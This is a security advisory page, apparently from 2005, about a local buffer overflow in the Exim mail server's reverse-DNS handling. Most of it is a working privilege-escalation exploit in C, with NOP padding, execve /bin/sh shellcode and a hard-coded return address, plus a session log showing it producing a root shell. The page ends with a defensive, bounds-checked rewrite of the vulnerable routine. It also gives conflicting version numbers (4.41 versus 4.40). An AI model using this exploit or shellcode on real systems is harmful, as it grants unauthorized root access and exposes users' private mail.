Exim Buffer Overflow Exploit
Source: plug@internode.on.net  Author: plugger  Published: 2005-05-31

Exim Buffer Overflow Exploit (Local, dns_build_reverse)

Summary
Exim is "a mail transfer agent (MTA) for Unix systems similar to Sendmail". Local exploitation of a buffer overflow vulnerability in Exim 4.41 allows execution of arbitrary commands with elevated privileges. The following exploit code can be used to determine whether your system is vulnerable or not.

Credit:
The information has been provided by plugger.

Details
Vulnerable Systems:
* Exim version 4.40

Example:
plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December 3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!

**** SMTP testing session as if from host
::%A:::::::::::::::::1 FF V

N 1 @ /bin/sh
**** but without any ident (RFC 1413) callback.

**** This is not for real!

>>> host in host_lookup? yes (matched "*")
>>> looking up host name for ::%A:::::::::::::::::1 FF V

N 1 @ /bin/sh
>>> IP address lookup using gethostbyaddr()
>>> IP address lookup failed: h_errno=1
LOG: no host name found for IP address
::%A:::::::::::::::::1 FF V

N 1 @ /bin/sh
sh-2.05b#

sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$

Exploit:
/*
* ripped straight off iDEFENSE advisory - so lazy I just picked
* up GDB... bored on a weeknight :(
*
* nothing to write home to mother about due to the fact that
* you need a local user account on a server and all you
* get is to read other people's emails ....
*
* not even my own shellcode. aleph1 shellcode - cut and paste job
* with nops to pad.
*
* Regards,
* Plugger aka Tony Lockett
*/

#include <stdio.h>
#include <unistd.h>

/* The fake "host address" handed to "exim -bh". The array is left unsized so
* the string literal keeps its terminating NUL: execve() needs NUL-terminated
* argument strings, and a char[288] would have dropped it. Payload bytes are
* exactly as in the original. */
char bomb[] =

/* the gear from iDEFENSE */
"::%A:::::::::::::::::" /* 21 bytes */
/* -------- */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90" /* 218 bytes */
/* --------- */
/* actual code courtesy Aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" /* 12 bytes */
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" /* 12 bytes */
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" /* 9 bytes */
"\xe8\xdc\xff\xff\xff/bin/sh" /* 12 bytes */

/* where EIP should point */
"\xf4\xf2\xff\xbf"; /* 4 bytes */
/* -------- */
/* 49 bytes */
/* -------- */
/* 288 bytes */
/* ========= */

int main(void)
{
char *exim[4];
exim[0] = "/usr/exim/bin/exim"; /* install path shown in the session above */
exim[1] = "-bh";                /* "SMTP testing session as if from host": the host argument is the overflowing input */
exim[2] = bomb;
exim[3] = NULL;                 /* argv must be NULL-terminated */
printf("Firing up exim - cross your fingers for shell!\n");
execve(exim[0], exim, NULL);
perror("execve");               /* only reached if exim could not be started */
return 1;
}
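The session above shows the defect being triggered through the host-address argument of "exim -bh": a string that merely looks like an IPv6 literal is accepted and expanded into a fixed-size buffer on the way to the reverse-DNS lookup (dns_build_reverse). The following is an added example written for this page, not Exim's code and not the exploit's: a reverse-lookup name builder that first parses the address with inet_pton() and then checks the output length on every write, so neither the page's "::%A::::..." string nor an undersized destination buffer can cause an overflow. The function name build_reverse_name and the 80-byte buffer size are this example's own choices.

```c
/* Added example (not Exim source, not the page's exploit): a bounds-checked
 * reverse-lookup name builder. Only an address that inet_pton() accepts is
 * ever expanded, and snprintf()'s return value is checked at each step. */
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

/* Fill out with the in-addr.arpa / ip6.arpa name for ip.
 * Returns 0 on success, -1 if ip is not a valid address or out is too small. */
int build_reverse_name(const char *ip, char *out, size_t outlen)
{
    unsigned char v4[4], v6[16];
    size_t used = 0;

    if (ip == NULL || out == NULL || outlen == 0)
        return -1;

    if (inet_pton(AF_INET, ip, v4) == 1) {
        int n = snprintf(out, outlen, "%u.%u.%u.%u.in-addr.arpa",
                         v4[3], v4[2], v4[1], v4[0]);
        return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
    }

    if (inet_pton(AF_INET6, ip, v6) == 1) {
        /* 32 nibbles, least significant first, each followed by '.' */
        for (int i = 15; i >= 0; i--) {
            int n = snprintf(out + used, outlen - used, "%x.%x.",
                             v6[i] & 0x0f, v6[i] >> 4);
            if (n < 0 || (size_t)n >= outlen - used)
                return -1;          /* would have truncated: refuse */
            used += (size_t)n;
        }
        int n = snprintf(out + used, outlen - used, "ip6.arpa");
        return (n < 0 || (size_t)n >= outlen - used) ? -1 : 0;
    }

    return -1;  /* neither a v4 nor a v6 literal: never expand it */
}

int main(void)
{
    /* Constructed inputs: two valid addresses and the page's trigger prefix. */
    const char *inputs[] = { "192.0.2.1", "::1", "::%A:::::::::::::::::" };
    char buf[80];

    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        if (build_reverse_name(inputs[i], buf, sizeof buf) == 0)
            printf("%-24s -> %s\n", inputs[i], buf);
        else
            printf("%-24s -> rejected\n", inputs[i]);
    }
    return 0;
}
```

The two checks that matter are the parse step (the exploit string is rejected before any expansion happens) and the length check on every snprintf() call (a buffer too small for a full 72-character ip6.arpa name yields -1 instead of a truncated or overrun write).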

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved